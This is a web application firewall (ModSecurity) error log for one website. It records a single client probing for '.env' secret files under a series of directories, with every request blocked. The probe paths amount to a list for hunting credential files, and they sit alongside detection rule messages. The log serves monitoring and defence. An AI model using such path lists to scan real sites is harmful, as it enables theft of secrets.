[Mon May 11 16:33:39.580208 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/tools/.env"] [unique_id "agHow1V4kyjgo4bQBUhXpgAAAM0"]
[Mon May 11 16:33:39.580444 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/tools/.env"] [unique_id "agHow1V4kyjgo4bQBUhXpgAAAM0"]
[Mon May 11 16:33:39.743592 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /scripts/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/scripts/.env"] [unique_id "agHow1V4kyjgo4bQBUhXpwAAAM0"]
[Mon May 11 16:33:39.743965 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/scripts/.env"] [unique_id "agHow1V4kyjgo4bQBUhXpwAAAM0"]
[Mon May 11 16:33:39.744175 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/scripts/.env"] [unique_id "agHow1V4kyjgo4bQBUhXpwAAAM0"]
[Mon May 11 16:33:39.744428 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/scripts/.env"] [unique_id "agHow1V4kyjgo4bQBUhXpwAAAM0"]
[Mon May 11 16:33:39.907358 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/bin/.env"] [unique_id "agHow1V4kyjgo4bQBUhXqAAAAM0"]
[Mon May 11 16:33:39.907735 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/bin/.env"] [unique_id "agHow1V4kyjgo4bQBUhXqAAAAM0"]
[Mon May 11 16:33:39.907925 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/bin/.env"] [unique_id "agHow1V4kyjgo4bQBUhXqAAAAM0"]
[Mon May 11 16:33:39.908169 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/bin/.env"] [unique_id "agHow1V4kyjgo4bQBUhXqAAAAM0"]
[Mon May 11 16:33:40.071927 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sbin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/sbin/.env"] [unique_id "agHoxFV4kyjgo4bQBUhXqQAAAM0"]
[Mon May 11 16:33:40.072308 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/sbin/.env"] [unique_id "agHoxFV4kyjgo4bQBUhXqQAAAM0"]
[Mon May 11 16:33:40.072495 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/sbin/.env"] [unique_id "agHoxFV4kyjgo4bQBUhXqQAAAM0"]
[Mon May 11 16:33:40.072739 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/sbin/.env"] [unique_id "agHoxFV4kyjgo4bQBUhXqQAAAM0"]
[Mon May 11 16:33:40.235670 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/local/.env"] [unique_id "agHoxFV4kyjgo4bQBUhXqgAAAM0"]
[Mon May 11 16:33:40.236034 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/local/.env"] [unique_id "agHoxFV4kyjgo4bQBUhXqgAAAM0"]
[Mon May 11 16:33:40.236228 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/local/.env"] [unique_id "agHoxFV4kyjgo4bQBUhXqgAAAM0"]
[Mon May 11 16:33:40.236474 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/local/.env"] [unique_id "agHoxFV4kyjgo4bQBUhXqgAAAM0"]
[Mon May 11 16:33:40.399539 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/portal/.env"] [unique_id "agHoxFV4kyjgo4bQBUhXqwAAAM0"]
[Mon May 11 16:33:40.399916 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/portal/.env"] [unique_id "agHoxFV4kyjgo4bQBUhXqwAAAM0"]
[Mon May 11 16:33:40.400098 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/portal/.env"] [unique_id "agHoxFV4kyjgo4bQBUhXqwAAAM0"]
[Mon May 11 16:33:40.400334 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/portal/.env"] [unique_id "agHoxFV4kyjgo4bQBUhXqwAAAM0"]
[Mon May 11 16:33:40.563289 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dashboard/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/dashboard/.env"] [unique_id "agHoxFV4kyjgo4bQBUhXrAAAAM0"]
[Mon May 11 16:33:40.563660 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/dashboard/.env"] [unique_id "agHoxFV4kyjgo4bQBUhXrAAAAM0"]
[Mon May 11 16:33:40.563842 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/dashboard/.env"] [unique_id "agHoxFV4kyjgo4bQBUhXrAAAAM0"]
[Mon May 11 16:33:40.564086 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/dashboard/.env"] [unique_id "agHoxFV4kyjgo4bQBUhXrAAAAM0"]
[Mon May 11 16:33:40.729605 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/panel/.env"] [unique_id "agHoxFV4kyjgo4bQBUhXrQAAAM0"]
[Mon May 11 16:33:40.729986 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/panel/.env"] [unique_id "agHoxFV4kyjgo4bQBUhXrQAAAM0"]
[Mon May 11 16:33:40.730189 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/panel/.env"] [unique_id "agHoxFV4kyjgo4bQBUhXrQAAAM0"]
[Mon May 11 16:33:40.730439 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/panel/.env"] [unique_id "agHoxFV4kyjgo4bQBUhXrQAAAM0"]
[Mon May 11 16:33:40.893753 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/crm/.env"] [unique_id "agHoxFV4kyjgo4bQBUhXrgAAAM0"]
[Mon May 11 16:33:40.894150 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/crm/.env"] [unique_id "agHoxFV4kyjgo4bQBUhXrgAAAM0"]
[Mon May 11 16:33:40.894354 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/crm/.env"] [unique_id "agHoxFV4kyjgo4bQBUhXrgAAAM0"]
[Mon May 11 16:33:40.894611 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/crm/.env"] [unique_id "agHoxFV4kyjgo4bQBUhXrgAAAM0"]
[Mon May 11 16:33:41.062815 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /erp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/erp/.env"] [unique_id "agHoxVV4kyjgo4bQBUhXrwAAAM0"]
[Mon May 11 16:33:41.063199 2026] [security2:error] [pid 1416109:tid 1416143] [client 35.88.116.41:54138] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/erp/.env"] [unique_id "agHoxVV4kyjgo4bQBUhXrwAAAM0"]
